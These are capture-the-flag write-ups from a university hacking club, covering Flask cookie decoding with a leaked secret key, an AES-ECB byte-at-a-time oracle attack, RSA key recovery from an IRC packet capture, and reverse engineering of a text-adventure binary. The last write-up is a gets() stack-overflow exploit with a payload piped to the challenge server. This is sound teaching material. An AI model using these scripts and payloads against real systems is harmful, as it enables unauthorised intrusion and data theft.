CHC Challenges

Web

Category: Web

Posted on February 21, 2017

Username: CHC. Password: OverErryThing.

When we visit the provided website and login using the given credentials we see that the website is made up of nothing but a little css super mario game. There are no input boxes or query string parameters in the url. As a result this leads us to believe the site is not injectable or vulnerable to XSS (though we should never rule anything out).

We also take a look at the document cookies in order to get a better understanding of the system as a whole.

Checking the sites cookies, we find the following:

session: .eJw9zsFrgzAYBfB_ZeS8g8YNOmGHjlix8H1BSSPJpWjVxmjK6DrUlP7vkw12eJf34Me7k91YnUl8J081iUkeGNbSfKpt06EoKISbECgu4Juu8viKcjPX49pFe7qm03b3BV6-kcczOfbNv6PZOeAsCzQbPPqmR6cicEmEFiYupFNl4bhAowT24LTRpTSrM6JVlItDoMRHz9PCoZNG262HtBg4KwywjIJPFqAJ1evKxXYCdqLIkhCYNJztR21PCwr4c-xhRpG96FLN2jY92CHSJY5IccA0j7SD99_vn-3VVZf2ciPx7frdPn4AsaJa-g.C1balg.NZ3Hhz13PR-1L37NFSfeotkV0DU

As we continue to gather information, we go back to the challenge page where we see a server binary is provided. Taking a look at this would be a logical next step. Given that python is a high level language that gets compiled to bytecode (which doesn't protect the code) we can nearly fully decompile the .pyc. A tool like Uncompyle2 works well.

Before going through the effort of decompiling, we'll 'strings' the binary as a first step (as we usually do).

strings provides the following output:

[chc@chc:~ ] $ strings login.pyc
Flaskt
Responset
redirectt
url_fort
requestt
sessiont
abortt
render_template(
LoginManagert
UserMixint
login_requiredt
login_usert
logout_user(
timedeltaNt
DEBUGt
SECRET_KEYt
LOLOLOL_I_Am_So_Secrett
logint
Userc
CHCt
OverErryThing(
namet
password(
selfR
login.pyt
__init__
  ...

Reading through the strings output we see something that should catch our eye. The Secret Key was hardcoded in login.py and is LOLOLOL_I_Am_So_Secret! We also can see that Flask is the web framework that the server employs.

To recap, we now have a session cookie and a Flask secret key. Through Googling or prior knowledge, you can find that a Flask app uses a secret key to sign the session cookie so that the client can't modify it. What can be signed can also be unsigned.

The following script will decode the session cookie using the Flask secret key.

import hashlib
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer

secret_key="LOLOLOL_I_Am_So_Secret"
cookie_str=".eJw9jk9rg0AUxL9K2XMPukZIhV7KRlF4T5TVsHspWv8-3VDSFHVDvnttDz0MDDPDj7mzcK56FtzZU80CljmDaHm21NR0KHMO7tEFjhvYpqss-lge13reMy_huzpN4RfY8oU9ntn72PxztGgGoMwF8TYhqUUbnPG8O-o9EDFXlBhFyipZjigmT1kkpHzC6LSh2TsZ-1oUHKN41TQPaEqDpCcU5QD25KABizzetNw3oncgKlZlPxYw8ZaK3k9_ubzg6Rk2xWFLZXbACByQyagonFD2B7S5USZ7_fv-2V5NdWkvNxbcrt_t4wcNiVvB.CyHtkQ.5Bl8L3gV4OO_tPqd8NJhdnHcwEY"
def decode_flask_cookie(secret_key, cookie_str):
    salt = 'cookie-session'
    serializer = TaggedJSONSerializer()
    signer_kwargs = {
        'key_derivation': 'hmac',
        'digest_method': hashlib.sha1
    }
    s = URLSafeTimedSerializer(secret_key, serializer=serializer, salt=salt, signer_kwargs = signer_kwargs)
    return s.loads(cookie_str)

print decode_flask_cookie(secret_key, cookie_str)

The output is as follows:

{u'Flag': 'CHC{d0n7_54v3_53cr37_k3y5_1n_53rv3r_f1l35}', u'_id': 'd7a24500d660fce5ccb87026b2fb63a5b497c3c64d4a26bfa29d564b1f9a6ef66d45a3146c37b2e564840e1c702b288995b7e69c2cc29484c412bb1d58874fbd', u'_permanent': True}

Flag: CHC{d0n7_54v3_53cr37_k3y5_1n_53rv3r_f1l35}


Crypto

Category: Crypto

Posted on February 21, 2017

Take + to also denote string concatenation in this write-up.

Introduction

(Have netcat installed)

Run echo "test" | nc chc.cs.cornell.edu 1339 | xxd to get this output:

00000000: 4438 29c5 6703 a773 d984 bc20 5ab6 a147 D8).g..s... Z..G
00000010: 120b 0b9a 49ff b1f7 fea7 16a3 e709 cf1c ....I...........
00000020: 76fb 8334 72ab 3708 f661 916a bc20 6d20 v..4r.7..a.j. m

Notice how each line is 16 bytes.

From the source code, the "test" + flag + padding was encrypted using AES in ECB mode to give that output.

The length of "test" is 4. From this line in the source code:

padding[16 - ( strlen(input_string) % 16 )] = '\0';

it appears that the length of padding must be 12, which is 4 less than 16. So padding ensures that the length of "test" + padding is a multiple of 16.

The block size is likely to be 16 bytes, or 128 bits.

The output is a total of 48 bytes, and 16 of these were "test" + padding so the flag is 32 bytes long.

More about AES in ECB mode

Try this:

  1. Make a memorable ascii string of length block size, like "AAAAAAAAAAAAAAAA"
  2. Feed it to the net cat and see what it spits out.

    > echo "AAAAAAAAAAAAAAAA" | nc chc.cs.cornell.edu 1339 | xxd
    00000000: a79e f6d9 9306 bfdb 796a caf9 c4a6 4823 ........yj....H#
    00000010: c252 b375 f5e4 46f5 c64c bcaa ab3d 2899 .R.u..F..L...=(.
    00000020: 0910 03b7 7cbc 9122 df0c 226c a6b3 d81b ....|..".."l....
    00000030: d207 48cd e1ee a272 7399 f30c 0493 1fa7 ..H....rs.......
  3. Double the string (concatenate it with itself) and do it again.

    > echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | nc chc.cs.cornell.edu 1339 | xxd
    00000000: a79e f6d9 9306 bfdb 796a caf9 c4a6 4823 ........yj....H#
    00000010: a79e f6d9 9306 bfdb 796a caf9 c4a6 4823 ........yj....H#
    00000020: c252 b375 f5e4 46f5 c64c bcaa ab3d 2899 .R.u..F..L...=(.
    00000030: 0910 03b7 7cbc 9122 df0c 226c a6b3 d81b ....|..".."l....
    00000040: d207 48cd e1ee a272 7399 f30c 0493 1fa7 ..H....rs.......

Notice how the first and the second blocks are the same ciphertext, just as in the plaintext.

The gaping flaw of ECB is, identical blocks of input produce identical ciphertext blocks. You can exploit this.

Decrypting the flag (General Idea)

  1. Make an input of size 15 like "AAAAAAAAAAAAAAA". This is one byte short of the block size.
  2. If the input is size 15, and it gets concatenated with flag, then the 16th byte that gets encrypted must be the first byte of the flag.
  3. Make a dictionary of the outputs of "AAAAAAAAAAAAAAAa", "AAAAAAAAAAAAAAAb", ... for every printable char. You want one of these chars to be the first byte of the flag.
  4. One of the outputs will match the outputs from step 1. This is the first byte. (spoiler: The capital letter C is the first byte)
  5. Then repeat step 1 with an input of size 14: "AAAAAAAAAAAAAA" (2 bytes short)
  6. Make a dictionary for "AAAAAAAAAAAAAACa", "AAAAAAAAAAAAAACb", ...
  7. Keep going until you have decrypted the whole flag. Automate it.

Automate!

Quick and dirty Go program.

package main

import (
    "bytes"
    "log"
    "net"
    "strings"
)

func getThreeBlocks(input string) [48]byte {
    conn, err := net.Dial("tcp", "chc.cs.cornell.edu:1339")
    defer conn.Close()
    if err != nil {
        log.Fatal(err)
    }
    _, err = conn.Write([]byte(input))
    if err != nil {
        log.Fatal(err)
    }
    conn.(*net.TCPConn).CloseWrite()

    var buf [48]byte
    conn.Read(buf[:])
    return buf
}

const printable string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
const flagLen int = 32

func main() {
    known := bytes.NewBufferString("") // Technically you can write "CHC{" here

outer:
    for known.Len() != flagLen { // while known.Len() != flagLen:
        preambleLen := flagLen - known.Len() + 15
        preamble := strings.Repeat("A", preambleLen)

        goal := getThreeBlocks(preamble)

        for _, char := range printable { // for char in printable: 
            try := getThreeBlocks(preamble + known.String() + string(char))
            if try == goal {
                known.WriteRune(char)
                log.Println(known.String())
                continue outer
            }
        }
        log.Fatalln("cannot continue")
    }
}

Output

2017/01/10 07:59:59 C
2017/01/10 08:00:07 CH
2017/01/10 08:00:13 CHC
2017/01/10 08:00:28 CHC{
2017/01/10 08:00:32 CHC{n
2017/01/10 08:00:32 CHC{n0
2017/01/10 08:00:38 CHC{n0w
2017/01/10 08:00:52 CHC{n0w_
2017/01/10 08:00:57 CHC{n0w_s
2017/01/10 08:00:58 CHC{n0w_s3
2017/01/10 08:00:58 CHC{n0w_s33
2017/01/10 08:01:13 CHC{n0w_s33_
2017/01/10 08:01:27 CHC{n0w_s33__
2017/01/10 08:01:29 CHC{n0w_s33__7
2017/01/10 08:01:32 CHC{n0w_s33__7h
2017/01/10 08:01:33 CHC{n0w_s33__7h4
2017/01/10 08:01:34 CHC{n0w_s33__7h47
2017/01/10 08:01:35 CHC{n0w_s33__7h475
2017/01/10 08:01:50 CHC{n0w_s33__7h475_
2017/01/10 08:01:51 CHC{n0w_s33__7h475_4
2017/01/10 08:02:06 CHC{n0w_s33__7h475_4_
2017/01/10 08:02:13 CHC{n0w_s33__7h475_4_F
2017/01/10 08:02:18 CHC{n0w_s33__7h475_4_Fu
2017/01/10 08:02:18 CHC{n0w_s33__7h475_4_Fu1
2017/01/10 08:02:22 CHC{n0w_s33__7h475_4_Fu1l
2017/01/10 08:02:37 CHC{n0w_s33__7h475_4_Fu1l_
2017/01/10 08:02:44 CHC{n0w_s33__7h475_4_Fu1l_H
2017/01/10 08:02:44 CHC{n0w_s33__7h475_4_Fu1l_H0
2017/01/10 08:02:49 CHC{n0w_s33__7h475_4_Fu1l_H0u
2017/01/10 08:02:50 CHC{n0w_s33__7h475_4_Fu1l_H0u5
2017/01/10 08:02:51 CHC{n0w_s33__7h475_4_Fu1l_H0u53
2017/01/10 08:03:06 CHC{n0w_s33__7h475_4_Fu1l_H0u53}

Flag: CHC{n0w_s33__7h475_4_Fu1l_H0u53}


Forensics

Category: Forensics

Posted on February 21, 2017

I know these guys are up to something. Just not sure what.

This challenge involves finding the flag as discussed by two l33t h4ck3rs on an IRC chat. We are presented with a .pcap file of network traffic.

The first step when given a .pcap file is to open it in some intuitive network traffic editor - the best of which is WireShark. (.pcap, as can be found with five minutes of googling, is an encapsulation for saved network traffic.) There are other alternatives, such as using tcpdump, but this is nowhere near as fast to use and abuse as Wireshark is.

Opening the file is as simple as installing wireshark (installer available for Windows, homebrew for OSX, packages available for most distros), and selecting File - Open your .pcap file. What we then see is something like below:

First View

The first thing we notice (with a bit of scrolling), is that there are only two computers talking to each other. We can tell because we can only see two unique IPs populating the "Source" and "Destination" columns. As a single sentence primer for network traffic - it is essentially "packets" of data (binary, ascii, whatever) that are sent from one computer to another. Wireshark helpfully infers the application producing the traffic (based on port, protocol and some other heuristics), and hints that it may be IRC. Note that this is always just a guess, and there is physically no way to _know_ what program is producing traffic, as any program can produce any arbitrary traffic.

A golden feature of wireshark is the ability to "Follow" a TCP network stream - essentially this prints all the data that has been sent over a single connection as can be inferred from the .pcap file. normal IRC is nice in this way, because all chat data is simpy piped down a single TCP port as plain text. We Right Click - Follow - TCP Stream on this stream, and we see the following!

First View

Now, we see the following (above), which is essentially all the data sent over the connection. We can quickly see the back an d forth between two people over the IRC - one person called "ev3nk1ng" and one called "l0gic". The easiest way to read this, and to understand what is going on is to simply read the whitepaper on IRC - also known as RFC2812 (https://tools.ietf.org/html/rfc2812). However this is not really necessary, as it is fairly simply to figure out what is going on (at least to the extent we are interested).

So, apparently, some thing is going on, and the computer being listened to (i.e. the packet intercept is going on between "ev4nk1ng" and the IRC server, while "l0g1c" could be anywhere else and his messages are only being "passively" intercepted when they are forwarded from the IRC server to "ev4nk1ng") want to send some info. However, he claims he changed his "key", and then proceeds to send a long hex encoded string. However, he also seems to make a mistake - saying "shit sorry, that was my priv". Seeing these long hex strings and talk of "priv key" should immediately make you think of public-private-key exchanges. If we are lucky, the first string he sent by mistake is his private key - meaning that we can decode any message encrypted with his public key. This is one of the most well known and widely used techniques in encryption, so to understand what is going on simply read the "Public Private Key Encryption" wikipedia article. He then proceeds to receive a message from the server, which is probably going to be signed with his public key, and thus we can read it since he accidentally published his private key.

We assume RSA encryption is in play (simply because it's the most well known and oldest), and because these challenges aren't meant to be far too difficult a quick google search returns multiple RSA encryptors/decryptors. Of the top five results, only one of them makes mention of providing input encoded in HEX as well as being able to provide a custom modulo.

First View

Inputting the message from l0g1c into this decryptor along with ev4nk1ng's private gives no result. Strange. Did he mess up? No worries, maybe he is as clueless as he seems - trying the second message from ev4nk1ng to l0gic gives a nice result:

First View

Flag: CHCFlag{pr073c7_y0ur_k3y5_n00b}


Reversing

Category: Reversing

Posted on February 21, 2017

There's a dragon afoot, we need a hero.

This challenge involves finding the key hidden inside an executable dragons, we are given a resources page which links to a list of x86 disassemblers to work with.

Since I'm on mac I decided to work with the nice GUI disassembler called Hopper Disassembler v3 for the length of this solution.

First I try running the executable in terminal to get familiar with the output. I'm greeted with:


~~~[* Here be dragons, you've been warned! *]~~~
Welcome to the text adventure dragon minigame!
You are an adventurer seeking fortune and honor by defeating the dragon plaguing the countryside
You have also been cursed by an evil wizard seeking to he himself control the dragon! You must complete your adventure before the curse consumes you!
Health: 100
So, where do you start your adventure?
1) The great caves of N'gorth
2) The city center
3) The old groves

Opening up the executable reveals a TEXT section and a series of functions, as usual. A brief scan through the text section reveals nothing that looks like a key, so we should check out the execution itself, it must somehow build a key.

We can scroll down to _main to how execution starts:


                         _main:
0000000100001490         push       rbp
0000000100001491         mov        rbp, rsp
0000000100001494         sub        rsp, 0x40
0000000100001498         lea        rax, qword [ds:0x100002d8e]                 ; "~~~[* Here be dragons, you've been warned! *]~~~\\n"
000000010000149f         lea        rcx, qword [ds:_DRAGON_INJURED]
00000001000014a6         lea        rdx, qword [ds:_REINFORCEMENTS]
00000001000014ad         lea        r8, qword [ds:_AVOID_CAVE_TRAPS]
...

We can recognize some familiar text thanks to the inplace strings on the right-hand-side. Looking around we can also spot a call to a function called _startGame, in which we find calls to _dead, _playerChoice, _greatCaves, _cityCenter, and _oldGroves. All the functions take the argument [ss:rbp+var_8], _playerChoice takes the additional arguments "gae" and 3. Here we can refer back to the execution: We were presented with three possible paths, the great caves, the city center, and the old groves. It's likely not a coincidence that _playerChoice takes the argument 3 and then the other functions called are named in the likeness of the options given (therefore [ss:rbp+var_8] likely has something to do with the player). That leaves the argument "gae". Let's look at one more example to see what this argument could be: let's jump to _cityCenter

In execution typing 2 brings us to the city center with the following prompt:


Health: 100
The city center is full of activity! There's so much to do!
1) Talk to the madman
2) Visit the healer
3) Leave the city for the old grove
4) Go to the tavern
5) Go to the caves

In the disassembler we see that _playerChoice is now presented with the arguments [ss:rbp+var_8], "f.j_r", and 5. So we again have 5 options and the parameter 5 being passed. Also we have a string of length 5 being passed. If the executable is building the key this is likely how it's being done. Let's assume that the key is built using the characters at the same index as the path taken, i.e. in the string "gae", should you choose the first path then the key with gain the letter "g" etc...

Going through the executable we can make a map of paths between function calls and their associated key strings:


paths = {
    '_start' : ('gae',['_greatCaves','_cityCenter','_oldGroves']),
    '_dead' : ('',[]),
    '_greatCaves' : ('au',['_enterDepths','_climbTop']),
    #_talkMadman
    '_cityCenter' : ('f.j_r',['_cityCenter','_healer','_oldGroves','_tavern','_greatCaves']),
    '_oldGroves' : ('',[]),
    #'_talkMadman' : '_cityCenter',
    '_healer' : ('jk',['_cityCenter','_dead']),
    '_tavern' : ('tx',['_cityCenter','_cityCenter']),
    '_climbTop' : ('me',['_fields','_reinforcements']),
    '_enterDepths' : ('c',['_sewers']),
    '_sewers' : ('b',['_cityCenter']),
    '_reinforcements' : ('_',['_fields']),
    '_fields' : ('ehl',['_rupturedSpire','_barracks','_forcedMarch']),
    '_barracks' : ('e',['_rupturedSpire']),
    '_forcedMarch' : ('',[]),
    '_rupturedSpire' : ('rxa',['_arrowAttack','_failedAttack','_failedAttack']),
    '_failedAttack' : ('',[]),
    '_arrowAttack' : ('ooox',['_end','_end','_end','_dead']), # Didn't call anything, made a new _end category
    '_end' : ('',[])
}

_talkMadman seems to be special because no choice is made, so we just pretend _cityCenter links back to itself in that case. To deal with some of the ambiguous options we added a _dead path which we populate manually based on flavor text (i.e. "The dragon seizes the oppurtunity of your mercy to lunge forward and snap you in two with its mighty jaws" in _arrowAttack). We also add _end where things end but the flavortext doesn't seem to suggest death.

Now let's find every path from _start to _end of length up to 16 (we can increase this if needed later): We will consider the paths above to be a graph and use a basic pathfinding algorithm. To output shorter paths first we will have the priority only based on number of loops:


def keygen(maxkeylen = 16):
    # visits[nodename] = (number of times visited node)
    visits = {}
    current_top = 0
    paths_heap = []
    for loc in paths.keys():
    visits[loc] = 0

    paths_heap.append([('_start',[],'')])

    while len(paths_heap) > 0:
        curr_loc, path_so_far, key_so_far = paths_heap[0].pop()
        visits[curr_loc] = current_top+1
        next_letters, next_locs = paths[curr_loc]
        if len(next_locs) == 0 and curr_loc == '_end':
            yield key_so_far, ",".join(str(i) for i in path_so_far)
        elif len(path_so_far) < maxkeylen:
            for i in range(len(next_letters)):
                next_letter, next_loc = next_letters[i], next_locs[i]
                times_seen = visits[next_loc]

                heap_index = times_seen - current_top
                while len(paths_heap) <= heap_index:
                    paths_heap.append([])
                    paths_heap[heap_index].append((next_loc, path_so_far + [i+1], key_so_far + next_letter))
        # Nothing left that we've visited only [current_top] times
        while len(paths_heap)>0 and len(paths_heap[0]) == 0:
            current_top += 1
            paths_heap.pop(0)

for key,path in keygen():
    print(key + "\t" + path)

Running this outputs 15345 lines of possible key/path combinations:


arue_hero   2,5,2,2,1,2,1,1,3
arue_hero   2,5,2,2,1,2,1,1,2
arue_hero   2,5,2,2,1,2,1,1,1
gue_hero    1,2,2,1,2,1,1,3
...

None of these first few allow us to kill the dragon, but it looks like the all end in hero, and possibly _ demarks spaces, let's try considering only keys which are made of english words separated by underscores:


import enchant
d = enchant.Dict("en_US")

...

def check_all_words(words):
    for word in words:
        if not d.check(word):
            return False
    return True

for key,path in keygen():
    words = key.split('_')
    if check_all_words(words):
        print(key+"\t"+path)

This outputs:


a_true_hero 2,4,1,5,2,2,1,2,1,1,3
a_true_hero 2,4,1,5,2,2,1,2,1,1,2
a_true_hero 2,4,1,5,2,2,1,2,1,1,1
a_x_true_hero   2,4,2,4,1,5,2,2,1,2,1,1,3
a_x_true_hero   2,4,2,4,1,5,2,2,1,2,1,1,2
...

It looks like this may be our key, chances are that the CHC{...} are added somewhere else in the executable, but by inputting the choices 2,4,1,5,2,2,1,2,1,1,3 we can verify that we have the correct combination to defeat the dragon. If we open up the executable now in a debugger and input the combination I'm sure we would find CHC{a_true_hero} somewhere, but we can also just try to input that into the CHC website (it works).

Note:

This challenge could also be solved by just playing with the combinations and checking the debugger every time, but that would take a while and it would be hard to tell if you were making progress. I like the above solution because it's easy to tell when progress is being made.

Flag: CHC{a_true_hero}


CHC Reversing Challenge

Category: Reversing

Posted on October 20, 2017

Reversing Challenge Writeup

We are given a binary file and a remote server to connect to. This usually means that the binary file is running on the remote server and is protecting some key.

First, lets connect to the remote server (by typing in the command nc chc.cs.cornell.edu 1345 into out terminal) and get a sense of what the binary does. When we connect, we are presented with a message and an input:

I'm trying to find a key, but there are 2 paths:
- 'path 1'
- 'path 2'
Which path should I choose?
> 

Playing around with it gives 2 different messages. If you put in path 1 or path 2, you get

Hmm, no key here. Thanks for trying. Bye.

If you try something else, you get

So I shouldn't take either path 1 or path 2? That's not helpful at all. Bye.

However, if you put in a long string, you dont get any response. Hmm, maybe the program crashed.

Lets try diving into the binary. In order to get some metadata about the file, you can run file stackbug, which returns

stackbug: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

Ok, so the only really important information that this gives us is that the file was compiled for a 64-bit linux system. This means that in order to run it locally, we will need access to a linux machine if we are running some other OS. There are several ways to do this, but I chose to use a vagrant virtual machine.

Ok, now that we are in the linux machine, lets try running the executable again with a long string and see if we can get any more information. What you will most likely see is a segmentation fault caused by the long input string. This means that there is likely a stack buffer overflow error occuring. If you are unsure about what this means, there is an excellent youtube channel that talks about these kinds of topics, and one of the videos that relates very closely to this challenge can be found here

Ok, even if you are unfamiliar with stack buffer overflows and how to exploit them, I will try to explain as much as possible here and guide you through the process of how to analyze and exploit the bug for this challenge.

The first thing you could do is to disassemble the binary file into the assembly instructions. For that we can run objdump -d stackbug. You will get a bunch of wierd numbers and words and may not know where to start. Luckily, the binary has not been stripped of its symbols so we can still see where the assembly for certain functions starts and stops. Every C program must have a main function, and that is were execution will start. If we look through the dissasembled output, we do indeed find a section labeled with <main>: that looks like this:

400852:    55                      push   %rbp
400853:    48 89 e5                mov    %rsp,%rbp
400856:    48 83 ec 10             sub    $0x10,%rsp
40085a:    89 7d fc                mov    %edi,-0x4(%rbp)
40085d:    48 89 75 f0             mov    %rsi,-0x10(%rbp)
400861:    83 7d fc 02             cmpl   $0x2,-0x4(%rbp)
400865:    75 0f                   jne    400876 <main+0x24>
400867:    bf 14 00 00 00          mov    $0x14,%edi
40086c:    b8 00 00 00 00          mov    $0x0,%eax
400871:    e8 9a fd ff ff          callq  400610 <alarm@plt>
400876:    48 8b 15 03 08 20 00    mov    0x200803(%rip),%rdx        # 601080 <path2>
40087d:    48 8b 05 f4 07 20 00    mov    0x2007f4(%rip),%rax        # 601078 <path1>
400884:    48 89 c6                mov    %rax,%rsi
400887:    bf 38 0a 40 00          mov    $0x400a38,%edi
40088c:    b8 00 00 00 00          mov    $0x0,%eax
400891:    e8 6a fd ff ff          callq  400600 <printf@plt>
400896:    48 8b 05 f3 07 20 00    mov    0x2007f3(%rip),%rax        # 601090 <stdout@@GLIBC_2.2.5>
40089d:    48 89 c7                mov    %rax,%rdi
4008a0:    e8 bb fd ff ff          callq  400660 <fflush@plt>
4008a5:    b8 00 00 00 00          mov    $0x0,%eax
4008aa:    e8 38 ff ff ff          callq  4007e7 <decide_fork>
4008af:    85 c0                   test   %eax,%eax
4008b1:    75 0a                   jne    4008bd <main+0x6b>
4008b3:    b8 00 00 00 00          mov    $0x0,%eax
4008b8:    e8 fa fe ff ff          callq  4007b7 <no_path>
4008bd:    b8 00 00 00 00          mov    $0x0,%eax
4008c2:    c9                      leaveq 
4008c3:    c3                      retq   
4008c4:    66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
4008cb:    00 00 00 
4008ce:    66 90                   xchg   %ax,%ax

If we also go a bit further up from main, we find a few other useful functions labels: decide_fork, path_2, path_1, no_path, and key_path. That last one sounds important. Based on how we interacted with the program earlier, the program printed out something when we entered path 1, path 2, and another thing when we put in something else. These probably correspond with calls the to path_1, path_2, and no_path functions. If we can get the program to make a call to key_path, that will probably get us the key!

Typically, when reversing a program, you want to follow its function calls, because that is what defines the behaviour of a program. In x86, the callq instruction calls the function at the address that it is given. The first interesting function call from main is on line number 0x400891 (those numbers on the left are techincally addresses, but can be thought of as line numbers), which calls the function at address 0x4007e7, also known as decide_fork. So now we can look a bit more carefully at decide_fork:

4007e7:    55                      push   %rbp
4007e8:    48 89 e5                mov    %rsp,%rbp
4007eb:    48 83 ec 20             sub    $0x20,%rsp
4007ef:    48 8d 45 e0             lea    -0x20(%rbp),%rax
4007f3:    48 89 c7                mov    %rax,%rdi
4007f6:    e8 55 fe ff ff          callq  400650 <gets@plt>
4007fb:    48 89 45 f8             mov    %rax,-0x8(%rbp)
4007ff:    48 8b 45 f8             mov    -0x8(%rbp),%rax
400803:    be 58 09 40 00          mov    $0x400958,%esi
400808:    48 89 c7                mov    %rax,%rdi
40080b:    e8 20 fe ff ff          callq  400630 <strcmp@plt>
400810:    85 c0                   test   %eax,%eax
400812:    75 11                   jne    400825 <decide_fork+0x3e>
400814:    b8 00 00 00 00          mov    $0x0,%eax
400819:    e8 a9 ff ff ff          callq  4007c7 <path_1>
40081e:    b8 01 00 00 00          mov    $0x1,%eax
400823:    eb 2b                   jmp    400850 <decide_fork+0x69>
400825:    48 8b 45 f8             mov    -0x8(%rbp),%rax
400829:    be 5f 09 40 00          mov    $0x40095f,%esi
40082e:    48 89 c7                mov    %rax,%rdi
400831:    e8 fa fd ff ff          callq  400630 <strcmp@plt>
400836:    85 c0                   test   %eax,%eax
400838:    75 11                   jne    40084b <decide_fork+0x64>
40083a:    b8 00 00 00 00          mov    $0x0,%eax
40083f:    e8 93 ff ff ff          callq  4007d7 <path_2>
400844:    b8 01 00 00 00          mov    $0x1,%eax
400849:    eb 05                   jmp    400850 <decide_fork+0x69>
40084b:    b8 00 00 00 00          mov    $0x0,%eax
400850:    c9                      leaveq 
400851:    c3                      retq   

We can see a few calls in this function, namely gets, strcmp, path_1, and path_2. If you know a bit about the gets function in C, you may know that is has been deprecated for a while now because it doesn't check the length of the buffer that it was given, which leads to buffer overflow exploits in programs that use gets. If you knew this, then you likely flagged this part of the code as where the stack overflow bug takes place. Either way, there is no call to key_path in this function, or any of the other functions. So that means that our exploit must find some way to call key_path by overwriting a buffer with your input to the program. Stack frames for a function will almost always store the return address of the function at the top of the function's stack frame. This is so that the function knows where to return to once it is done executing. However, if we can hijack this address to point to key_path, then we can essentially call the key_path function. So, our plan of attack is to craft a specific input that will overwrite the return address of the decide_fork function so that it returns into key_path and hopefully gets us the key. From dissasembling the file, we know that key_path is located at address 0x40076d, so that is the value you will need to overwrite the return address with. From here, you have a few options. You can either guess the length between the start of the buffer that your input gets placed into and the return address, write that many characters to the input and then append key_path's address. Or, if you want to get a bit more exact, you can use gdb and actually inspect the stack at run time to figure out the offset for yourself.

So we will start up gdb with the binary file with the following command:

gdb ./stackbug

Once in the gdb shell, in order to have more control over execution, we will set a break point at the main function like so:

break main

Then we will start running the program with the run (shortcut r) command. We will see that gdb has stopped execution somewhere at the top of main. In order to actually see the next assembly instruction that will be exectued, you can enter

set disassemble-next-line on

into the gdb shell. There are 2 main commands for moving through an assembly program in gdb. You can either use the stepi (shortcut si) command or the nexti (shortcut ni) command. The si command will step into functions, while the ni command will step over functions. For assembly instructions that call C library functions, we will typically want to step over them with the next command, but for all other instructions, we will simply si. So we will step through the program with the ni command until we get to:

callq  0x4007e7 <decide_fork>

We want to step into this function with the si command. Ok, now we are in decide_fork. After calling next for a few instructions, the (gdb) will disappear, meaning the program is requesting input. In order to recoginize our input later in memory, we will provide the characters AAAAAAAA as input. We will be able to recognize it later because the character A has hex ascii code 0x41. Ok, now before we step any further, let us try and find those characters in memory. In order to do that, we have to know where the stack is in memory. Luckily, there is a register that does just that. If you type info registers into gdb and look for the rsp register, that huge number is the value in memory where the stack pointer is. When I ran this, that value was 0x7fffffffe4c0, but it will most likely be different for you due to stack randomization. Ok, lets look at memory, using the x/20wx [sp] where [sp] is the value of the stack pointer. My memory looked like this:

0x7fffffffe4c0:    0x41414141  0x41414141  0xf7a89700  0x00007fff
0x7fffffffe4d0:    0xf7dd4400  0x00007fff  0xf7a7ee92  0x00007fff
0x7fffffffe4e0:    0xffffe500  0x00007fff  0x004008af  0x00000000
0x7fffffffe4f0:    0xffffe5e8  0x00007fff  0x00000000  0x00000001
0x7fffffffe500:    0x00000000  0x00000000  0xf7a32f45  0x00007fff

Look at that. The first 8 values in memory are 41, the same as the character code for the letter A. Ok, so now we know where the buffer starts. Now we have to find the return address so we know how much memory to overwrite. We know we called decide_fork from main which had address 0x400852, so we are looking for some value around there. The first value that we come accross is 3 rows down in the 3rd column: 0x004008af. Ok, so that must be our return address. Memory addresses are increasing from left to right, top to bottom, so we can count the offset as 2 rows of 16 bytes plus 2 columns of 4 bytes. 2*16+2*4 = 40. So our offset it 40.

Now we have to generate the input string that we can feed into the program in order to exploit this vulnerability. I ended up writing a python program that generates 40 A's and then appends the address of key_path (0x0040076d) onto the end:

print "A"*40 + "\x6d\x07\x40\x00"

Notice that the address is appended in reverse, which has to do with the endianess of machines. So now I can pipe the output of my python program (which I called exploit.py) into the nc call to the server like so:

python exploit.py | nc chc.cs.cornell.edu 1345

Which returns:

I'm trying to find a key, but there are 2 paths:
- 'path 1'
- 'path 2'
Which path should I choose?
> What's this? I've found the key! Let me share it with you:
CHC{g3ts_1s_d4ng3r0us_4nd_5h0uld_n0t_b3_u5ed}

So the key is: CHC{g3ts_1s_d4ng3r0us_4nd_5h0uld_n0t_b3_u5ed}. If there is any moral to this story it is that gets is indeed dangerous and should not be used.


Copyright © Cornell Hacking Club 2021